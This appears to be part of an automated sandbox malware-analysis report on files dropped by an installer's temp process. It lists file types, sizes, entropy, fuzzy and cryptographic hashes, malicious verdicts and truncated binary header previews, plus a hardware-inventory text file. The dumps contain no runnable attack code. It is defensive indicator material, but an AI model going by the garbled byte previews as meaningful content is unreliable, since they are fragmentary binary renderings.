                                                                                                                                                                                                                                        SHA-512:6D1C221430668BE2C7DAAE9D27AAA621038F8F52F5AC3CF9A6D02D10F33E85718E08017E5CF6CDB9E2CB10CE66EB9212DCC6C88FB17C4FB486C7D71720B6BDFB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...//.U...........!..................... ...@....... ..............................`v....@.................................4...W....@.......................`.......,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p.......H........ ..,...................P ......................................0..L....7.^...........w. ..E&."...v.hi.l..Y....3..%?...G...7.C.Y|.k.8..vb.kq..P.qw..F.(.5."..i.,1.i9....\t.)...gr..7BSJB............v4.0.30319......l...p...#~..........#Strings............#US.........#GUID.......`...#Blob...........GW........%3........................................................................l.e...............'.e...<.e...d.J.......................................7.....P.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7008240
                                                                                                                                                                                                                                        Entropy (8bit):6.674290383197779
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:9VPhJZWVvpg+za3cFlc61j2VjBW77I4iNlmLPycNRncuUx24LLsXZFC6FOCfDt2/:BJZzI1ZR3U9Cxc22aDACInVc4Z
                                                                                                                                                                                                                                        MD5:47307A1E2E9987AB422F09771D590FF1
                                                                                                                                                                                                                                        SHA1:0DFC3A947E56C749A75F921F4A850A3DCBF04248
                                                                                                                                                                                                                                        SHA-256:5E7D2D41B8B92A880E83B8CC0CA173F5DA61218604186196787EE1600956BE1E
                                                                                                                                                                                                                                        SHA-512:21B1C133334C7CA7BBBE4F00A689C580FF80005749DA1AA453CCEB293F1AD99F459CA954F54E93B249D406AEA038AD3D44D667899B73014F884AFDBD9C461C14
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......QH^~.)0-.)0-.)0-.Q.-.)0-...-.)0-.F4,.)0-.F3,.)0-.F5,.)0-.F1,.)0-.Y1,.)0-.B5,.)0-.B1,.)0-.)1-m,0-.Y4,.)0-.Y5,|(0-.Y0,.)0-.Y.-.)0-.).-.)0-.Y2,.)0-Rich.)0-................PE..d....._.........." ......?...+.....X.?.......................................k.....R.k...`.........................................pKK.....d.e.|....`k.......g.......j......pk..6....F.T................... .F.(.....F.0.............?.p+...........................text...2.?.......?................. ..`.rdata...z&...?..|&...?.............@..@.data....o... f.......f.............@....pdata........g.......f.............@..@.rsrc........`k.......j.............@..@.reloc...6...pk..8....j.............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2620496
                                                                                                                                                                                                                                        Entropy (8bit):6.585920836421845
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:DkkOdZ7GfbhfKr3dSBmmvYphxOnWyVbgW7udHFBeWB61N/1oDRTrorVPTeB/CrCY:Dkm4SBmmgpPyVbgGN/1oNI5c/SRCbUUm
                                                                                                                                                                                                                                        MD5:39F452CDA9C88FB2D3BCD69E6187E803
                                                                                                                                                                                                                                        SHA1:9786EA3FC2C66240299279205CED1EDC803A002A
                                                                                                                                                                                                                                        SHA-256:212FB1753A42CFACDCD13FBAA62183AD4739C5AA720B1C49D8334DA37DA3B5D6
                                                                                                                                                                                                                                        SHA-512:4C5ED8F070423DE9C8EB034C3C1BBDA7EA225031A09D1BC234602C1DC46A702331036EFA92F764807347F8B9F92D0901D75A367F7FD388F160C7BAF57720CCD0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w..............n2......n$.t............n#.....D#.....=5.................._....n-."....n5......D3.......0......n6.....Rich............................PE..L...Z2 f...........!.....\...r......O........p............................... (.....he(...@..........................j .N...d[ .......".t.............'.P*...p&......s.................................@............p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data...T>...p ......\ .............@....rsrc...t....."......x".............@..@.reloc.. ....p&......0&.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):439
                                                                                                                                                                                                                                        Entropy (8bit):4.823425713064833
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:xr9UIm6eQNuuiqEUG1bkAddYMUEqRpXQu:t82NuVp1LzVypl
                                                                                                                                                                                                                                        MD5:2DB9E4993F5E2F0E57C329F9EAC3B990
                                                                                                                                                                                                                                        SHA1:E1BFA095969ED94A8C8CEBF15EB1C3CAB7654B47
                                                                                                                                                                                                                                        SHA-256:96BDBF6D9C20A2EE3249FBA5DAD3BF9BF7D14EAB3E3915EE75A11716BCB82F03
                                                                                                                                                                                                                                        SHA-512:9FBC870286643AFD636B37C3E4382F3DD2945E9C1D4F09EF7CDBA49B221D8F35D13C3228803469A7D929E81CF4751A78D934CA6A8A408A9A6B5A0D29E2A6CD99
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:module QtGraphicalEffects.private..plugin qtgraphicaleffectsprivate..classname QtGraphicalEffectsPlugin..FastGlow 1.0 FastGlow.qml..FastInnerShadow 1.0 FastInnerShadow.qml..FastMaskedBlur 1.0 FastMaskedBlur.qml..GaussianDirectionalBlur 1.0 GaussianDirectionalBlur.qml..GaussianGlow 1.0 GaussianGlow.qml..GaussianInnerShadow 1.0 GaussianInnerShadow.qml..GaussianMaskedBlur 1.0 GaussianMaskedBlur.qml..DropShadowBase 1.0 DropShadowBase.qml..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):293336
                                                                                                                                                                                                                                        Entropy (8bit):6.3387704733743675
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:e6w9S8XR5N3W5a46zG0WkGgcaWALhrkw/FKn0HH:RwM8h5Nm5aRi0bWALhrz9K0H
                                                                                                                                                                                                                                        MD5:3DF62B62984471E2DCD1C69EA5FDD182
                                                                                                                                                                                                                                        SHA1:8F28C3F78588B1F307882AD5512934A93E98322E
                                                                                                                                                                                                                                        SHA-256:07A5CEB6E6EFB996690AEDF18221F18644FCEAF94501722B10B75A139EA3899C
                                                                                                                                                                                                                                        SHA-512:434A19429E672A68D26A02E29388A09B1CAAA3051082DDC4E141AF3AC53FAEFAD05CF3245D9A015EC7A3BBB1B573CD822B1B10079568F48F350D69818E16AA21
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........`.5..zf..zf..zf.y.f..zf.t~g..zf.tyg..zf.t.g..zf.t{g..zf.~g..zf.{g..zf..{fN.zf.h.g..zf.tsg..zf.tzg..zf.t.f..zf...f..zf.txg..zfRich..zf........................PE..d...^.Vf.........." ....."...0.......................................................4....`.............................................x....................P...$...P...)......0......p...........................@...8............@...............................text...N!.......".................. ..`.rdata.."....@.......&..............@..@.data........@......................@....pdata...$...P...&... ..............@..@.rsrc................F..............@..@.reloc..0............L..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1001280
                                                                                                                                                                                                                                        Entropy (8bit):5.973788439232148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:NWJjEJM48ZDBXci9fHQEKZm+jWodEEw9N2:NWJjd48rJw
                                                                                                                                                                                                                                        MD5:37DC8CC78ECBCD12F27E665B70BAEFA7
                                                                                                                                                                                                                                        SHA1:46FB9910CC10C4C0C52B547700E1950CE233BE89
                                                                                                                                                                                                                                        SHA-256:B53ADD5B7BD6BB11FECC7BE159885D0B75736D02423C11EDC6EEB6F4BEA80F6C
                                                                                                                                                                                                                                        SHA-512:078B0B408510C07EAC85518F03A9E3FAC8E4C8E2E36CCB8CD26962498C7F5BEDBD79F7034AF3EBFEF9984F85D81C9032446B1B5C156B2174A769657EA0AB60A1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ey.T..w...w...w......w.......w.:Fv...w...v...w.:Ft...w.:Fs.N.w.:Fr.J.w.:Fw...w.:F....w.:Fu...w.Rich..w.........PE..d.....W.........." .....j..........p........................................`.......d....`A.........................................@..........P....@.......p..\.......@?...P..........T...........................`........................<..@....................text...uh.......j.................. ..`.rdata..............n..............@..@.data....:...0......................@....pdata..\....p.......:..............@..@.didat..h....0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):58928
                                                                                                                                                                                                                                        Entropy (8bit):6.210845696900253
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:ZNVfaQtx0rrYIMhJygv8Vv8g+FB+iYB7E:nVCQt5Ibg47KB+tB7E
                                                                                                                                                                                                                                        MD5:9BB14D1464473D1F56AE1D24D6392E92
                                                                                                                                                                                                                                        SHA1:8B7AB1FB92B09D4AFC6F9D42E4D8AD5D1C8D0FD7
                                                                                                                                                                                                                                        SHA-256:BDDAB562C19FA28B2EF824ED6E18FF7D692B2196BC34FAE7895D9FAF51926C1A
                                                                                                                                                                                                                                        SHA-512:90029EBF849B2DA771DC7DCCBA392CD66E71CF77376F6279DD0864EFEBFC535E882CC63F0BC8EFE3B067AB3C6639BC70365915BBD8EA18EEB68BB22F866AC66D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........g.4.4.4U.|4.4`.5.4...5.4.4..4`.5.4`.5.4`.5...4`.5...4`.l4...4`.5...4Rich.4................PE..d....3.\.........." .....l...>.......n..............................................Zo....`A............................................\......P...............d.......0>..........p...T..............................................p............................text...wj.......l.................. ..`.rdata...".......$...p..............@..@.data...............................@....pdata..d...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):91024
                                                                                                                                                                                                                                        Entropy (8bit):6.388398823218999
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:we9rhlZHAE3GKE0s7Z54x/wJFxOJP0zyZL52/xP48yS/WGneBK8jcljEF4/7FP:we9rrZVW7UP02ZL52/xKS/WGmK8Ql/xP
                                                                                                                                                                                                                                        MD5:58E097F71CD3D820E56A57082F331F9B
                                                                                                                                                                                                                                        SHA1:E0ADDC85992A7984C1989E0139E35113EF5077CF
                                                                                                                                                                                                                                        SHA-256:D25311D8E66BDD0C66A048F390AC4801DDED8A4BEBD8C12683463BC093A16BFC
                                                                                                                                                                                                                                        SHA-512:2545405EA52B1998031D05E5AC8E8F1699DC563D0E29CC858389F0DC65EB716FFD65EC756583EB990EFCA89249C344AA67BC2189EBFBFEBDB2251CFF6B4B0DC8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^...^...^...&|..^...5...^..+...^..+...^..+...^..+...^...5...^...^..R^..6+...^..6+...^..6+...^..6+...^..Rich.^..........................PE..d......b.........." .........l...............................................p............`.............................................L.......,....P.......@..H....4.../...`..........p...........................p...8...............X............................text............................... ..`.rdata...K.......L..................@..@.data...8....0......................@....pdata..H....@....... ..............@..@.rsrc........P.......0..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):272024
                                                                                                                                                                                                                                        Entropy (8bit):6.401523708321372
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:jtIyoyUR96mycNRJ+JD3KJjCcyKVBd3BG/8R2HRExeobW:jeykR96mycPJ8mVBxBJ2Hqxeob
                                                                                                                                                                                                                                        MD5:0EFE3D3758D3BFBAAAC4083008F4ADEA
                                                                                                                                                                                                                                        SHA1:3A2277853EFAD84466235B0C2D2A3A622F7449B0
                                                                                                                                                                                                                                        SHA-256:0E19F6DE21D787067F49238FC75B620F876AEDF112A9365F4A0A38B66DF63EC4
                                                                                                                                                                                                                                        SHA-512:466E0899D43F097069F2D8FA386F29E5091E6D1D49351385749A67F0D59D81227CB9F3C48B96CD8FA3682FB29BA6D65D8A9906E69E4A2F8F50DFEB56816CD6F6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N..............9.......................................A.........#...............U......=..........Rich...................PE..d.....\e.........." ...#.....................................................P......K.....`.............................................l......|....0..h................&...@..`....e..p....................f..(....d..@............................................text............................... ..`.rdata..:...........................@..@.data... ...........................@....pdata..............................@..@.rsrc...h....0......................@..@.reloc..`....@......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):330736
                                                                                                                                                                                                                                        Entropy (8bit):6.381828869454302
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:6qLZcTC3wR/0JNZ+csBkBv0L0hq+SvcO8MsvwbIeblsjTR:6qNcCwqHE2fYlsPR
                                                                                                                                                                                                                                        MD5:03761F923E52A7269A6E3A7452F6BE93
                                                                                                                                                                                                                                        SHA1:2CE53C424336BCC8047E10FA79CE9BCE14059C50
                                                                                                                                                                                                                                        SHA-256:7348CFC6444438B8845FB3F59381227325D40CA2187D463E82FC7B8E93E38DB5
                                                                                                                                                                                                                                        SHA-512:DE0FF8EBFFC62AF279E239722E6EEDD0B46BC213E21D0A687572BFB92AE1A1E4219322233224CA8B7211FFEF52D26CB9FE171D175D2390E3B3E6710BBDA010CB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............_._._..*_._,.^._..^._,.^._,.^._,.^._a.^._._=.._a.^._a.^._a.F_._.._._a.^._Rich._................PE..d......_.........." .........................................................@.......^....`.................................................((....... ...........0...........0..H...xL..T....................N..(....L..0............................................text............................... ..`.rdata..p...........................@..@.data...8...........................@....pdata...0.......2..................@..@.rsrc........ ......................@..@.reloc..H....0......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):418696
                                                                                                                                                                                                                                        Entropy (8bit):6.021730081658021
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:GIDKBfonoNFTFGQ1N421Ub9bNuAdlAzy/hA1h6H7BdCEtvrPJIs4u2bYIzK1I6hM:nnATFZ16bBdCEtvrPJIs4RbYIa
                                                                                                                                                                                                                                        MD5:5F4D7D0FC695C2FBC9BEA18271BA6778
                                                                                                                                                                                                                                        SHA1:F116880355A4A8936CDD1FE953FCF126833DB0D8
                                                                                                                                                                                                                                        SHA-256:E0ABCA4F407DD17B77EADE645114CC700397D99EE86CD6BF46DE7D7C8D8BCECA
                                                                                                                                                                                                                                        SHA-512:36B65443EED8FFF62ABB5AC2BA3C4641181F860EC93211F2F1363CCF3EDE5295C15D3021EB34DBF7A4AFCAFE56F087A3654036166455818367D6556622670956
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....sx`.........." ..0..6...........U... ...`....... ..............................`c....`.................................LU..O....`...............@...#...........T............................................... ............... ..H............text....5... ...6.................. ..`.rsrc........`.......8..............@..@.reloc...............>..............@..B.................U......H................................S.......................................0..Q...............}.....(%.....}......}......}.......}.......}.......}.......}.......}....*..*..*.s&...z..{....*2.{....o'...*.*....0...........{....,Y.{......j/N...{....iY...0..+......{.....{....i.((.....{.....jX}......X....Y...{......j/.*.{....-T.{.....{....j.{....s)......{......{.....|.....{.....{....,..{....+...{....oE...}......1..{.......o*.....{.....jX}....*..0..............s+.....{....,`.{......j/
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):375768
                                                                                                                                                                                                                                        Entropy (8bit):6.40112684770505
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:OMcPPIlbJyh0zhqcDoDxaIGZp29pRzlky+dToha8DhKAKlj:6YlbJo0NTED5xxky+dTo+J
                                                                                                                                                                                                                                        MD5:0F07D34838521637570E89E4006AEF43
                                                                                                                                                                                                                                        SHA1:11806E1542D44921353B731D63CEAA36FB4DB908
                                                                                                                                                                                                                                        SHA-256:5E8E5FCFF169B2C081F7B17865FFB31A0343CA67F0DCF18C6CA691E42E180EC9
                                                                                                                                                                                                                                        SHA-512:242225C9EA191C5B4411CDA58B0ACF790137D33665A3E40E80EF258F71EB2A88435068FBBECC9483014BE9DD5EB7F488253F5173F3170EBE52F0833F93B5CEAB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........g..4..4..4...5..4...5..4...5B.4...5..4...5..4...5..4...5..4..4b.4-..5..4-..5..4-.k4..4...4..4-..5..4Rich..4........PE..d.....f.........." ................0.....................................................`.........................................PG.......G..<.......0.......,(.......)......L.......p.......................(.......8............................................text............................... ..`.rdata...e.......f..................@..@.data....'...`.......D..............@....pdata..,(.......*...V..............@..@_RDATA..............................@..@.rsrc...0...........................@..@.reloc..L...........................@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):858512
                                                                                                                                                                                                                                        Entropy (8bit):6.6801261433761185
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:oKI9x2m++aGCiJez1mfrq06cJKGv1DS7BQLG9Dp:U5BpCiy1mfu0RJKcDS7BQCl
                                                                                                                                                                                                                                        MD5:44823FB067EFDD3DC2F023B313AB263C
                                                                                                                                                                                                                                        SHA1:184ED6F663E2F4C67411BF2BF6DBC4BE3387005D
                                                                                                                                                                                                                                        SHA-256:225D432437DDF86B0F0685C424268ED65BFCBE1907CF4F1D7B1AE6A6CB575D80
                                                                                                                                                                                                                                        SHA-512:4A53156F203E8364D491A3B39E55EE41474473CB3C9CD9A14CDF9A357E8A9EB9DADC859C985CA40E07DC379B9BFDCDA4C94CCFF313DF63B20DE4CEF383E9C2F8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........H~.H~.H~.....J~.E,..F~.E,=.E~.E,<.L~.E,..L~.....M~.H~.]....=.I~...<.K~.....I~.E,..I~.....I~.RichH~.........................PE..L.....*f...........!.....d...........k.......................................P............@.........................0i..t....i..x.......H................).......U......8............................c..@...............h............................text....b.......d.................. ..`.rdata...............h..............@..@.data...h ...........z..............@....qtmetad............................@..P.rsrc...H...........................@..@.reloc...U.......V..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2806
                                                                                                                                                                                                                                        Entropy (8bit):3.9239610717683986
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:MV3hrMZGYvAOPOrgkAVllg1NJa6PrjAXFZ6xOHZAFZ6xOHKjAFZArXzXhs+U+a8q:MnZoAOPOrgkA9g1NJa6PrjAVZakZGZaO
                                                                                                                                                                                                                                        MD5:E9D04A488B2901DEB37AD99D77740857
                                                                                                                                                                                                                                        SHA1:9AD315E085E55166267A78387DD98D5EA72E8BF6
                                                                                                                                                                                                                                        SHA-256:A3A195DEB84E27D8A05324949C3D5905BEAA05BAD572D6A3C4A00A693155E4D5
                                                                                                                                                                                                                                        SHA-512:4D33225331BDBAF3E9ACF7BF2D8A79BCD9E4276AB72E98307460262C9FBE0ADBFDBE22A786290111557C6A90EF6D19EC02FD2777F47B41E19755BE72BB6F88D7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:......[.H.W.I.n.f.o.].....m.o.d.e.l._.n.a.m.e.=.'.R.O.G. .S.T.R.I.X. .B.5.5.0.-.F. .G.A.M.I.N.G. .(.W.I.-.F.I.).'.....m.a.n.u.f.a.c.t.u.r.e.r.=.'.A.S.U.S.T.e.K. .C.O.M.P.U.T.E.R. .I.N.C...'.....f.r.e.q.=.'.3.9.'.....c.p.u._.m.a.n.u.f.a.c.t.u.r.e.r.=.'.A.u.t.h.e.n.t.i.c.A.M.D.'.....c.p.u._.m.o.d.e.l._.n.a.m.e.=.'.A.M.D. .R.y.z.e.n. .9. .5.9.5.0.X. .1.6.-.C.o.r.e. .P.r.o.c.e.s.s.o.r. . . . . . . . . . . . .'.....d.r.a.m._.s.i.z.e.=.'.1.7.1.7.9.8.6.9.1.8.4.,.1.7.1.7.9.8.6.9.1.8.4.'.....d.r.a.m._.m.a.n.u.f.a.c.t.u.r.e.r.=.'.K.i.n.g.s.t.o.n.,.K.i.n.g.s.t.o.n.'.....d.r.a.m._.f.r.e.q.u.e.n.c.y.=.'.2.4.0.0.,.2.4.0.0.'.....s.t.o.r.a.g.e._.c.a.p.a.c.i.t.y.=.'.1.8.6.3. .G.B.,.1.8.6.3. .G.B.,.9.3.2. .G.B.,.1.8.6.3. .G.B.,.9.3.2. .G.B.'.....s.t.o.r.a.g.e._.i.n.t.e.r.f.a.c.e.=.'.S.S.D.,.S.S.D.,.S.S.D.,.S.S.D.,.S.S.D.'.....n.i.c._.m.o.d.e.l._.n.a.m.e.=.'.I.n.t.e.l.(.R.). .W.i.-.F.i. .6. .A.X.2.0.0. .1.6.0.M.H.z.(.O.n.B.o.a.r.d.).,.I.n.t.e.l.(.R.). .E.t.h.e.r.n.e.t. .C.o.n.t.r.o.l.l.e.r. .(.3.). .I.2.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2704896
                                                                                                                                                                                                                                        Entropy (8bit):5.925433873080991
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:IIj+xNMJhwcQ7+a5DypU6C1w4pIIt8pZ6e0g1CPwDv3uFfJsg:p+MRQ2pDCCHIt8p1CPwDv3uFfJ
                                                                                                                                                                                                                                        MD5:A3F468A033C802C94DAA8E0BD9DC4C7A
                                                                                                                                                                                                                                        SHA1:2041D719D63FA7455B15A8168B6C362B7D6F4EAB
                                                                                                                                                                                                                                        SHA-256:B1F985116F7C8BE9B022F35213CE1F48B2C640AB2DD0D080A80DBAA42437B25A
                                                                                                                                                                                                                                        SHA-512:1CE7AE7C29837347FD770C867F8AE6566AF76B68840B08A9F6F9C51026251689ED2FE66B00B3F4EE6F4D103DF0A4B02911ED50A905E60750631306B42E89BF65
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f..............q+......q........$........./....q)......q..9....q,......q-......q*.....Rich............................PE..d...*.6`.........." ................T.........................................)...........@.........................................@s$..h... )......@).|....`'.............P).pN..P................................................()..............................text...V........................... ..`.rdata..[...........................@..@.data....u....&..*....&.............@....pdata.......`'.......&.............@..@.idata....... ).......(.............@....rsrc...|....@).......(.............@..@.reloc...o...P)..p....(.............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):644096
                                                                                                                                                                                                                                        Entropy (8bit):5.526662897266232
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:U4ROKzRoNmA5OR6tPMQaRmvj4tMO5/vuUta7GTDrPnkR8edJH:DmmA5OjjHuGzv68edJH
                                                                                                                                                                                                                                        MD5:C3725B33DC3D5AC2CC041E015DD275FC
                                                                                                                                                                                                                                        SHA1:74D72B51047F1474F943CFD99B88DD081C7170C4
                                                                                                                                                                                                                                        SHA-256:36AC1D72044CFACC4C1E85D380EE6BA0976D4D7AA23068F0B7F204214A942995
                                                                                                                                                                                                                                        SHA-512:DF25CC9F19A044449D70535BD8E5ED0B1C3BFD40E4E4904A7F495E8A06023CA695D28F81CD1D65F02EA86859C261F8DF502499BD0B06DB19F56B6299C329CFCC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............B..B..B..IB..B..DB..B..qB..B..FB..B..B1..B..pB..B..AB..B..@B..B..GB..BRich..B........................PE..d...X.6`.........." .........D.......v....................................... ............@..............................................N......P.......s....0..8O..............8...P...................................................0............................text.............................. ..`.rdata...'.......(..................@..@.data....K.......D..................@....pdata..PX...0...Z..................@..@.idata...Q.......R...^..............@....rsrc...s...........................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):134032
                                                                                                                                                                                                                                        Entropy (8bit):6.570489921495016
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:vp/izzvTlS0eRHWMlLCjL/QNQ5fYNAI/E3:BcTlSZBLCjL/QNPN56
                                                                                                                                                                                                                                        MD5:7C7F0913AB04A9AF8783D76DF338EDDA
                                                                                                                                                                                                                                        SHA1:4E526E15E05BB6B5A902217B31B8D6EF36CAEE96
                                                                                                                                                                                                                                        SHA-256:A9C28B91E4ED90D620F554ABE21B278310C451BB36A1A5B338C673BE7FE9C95C
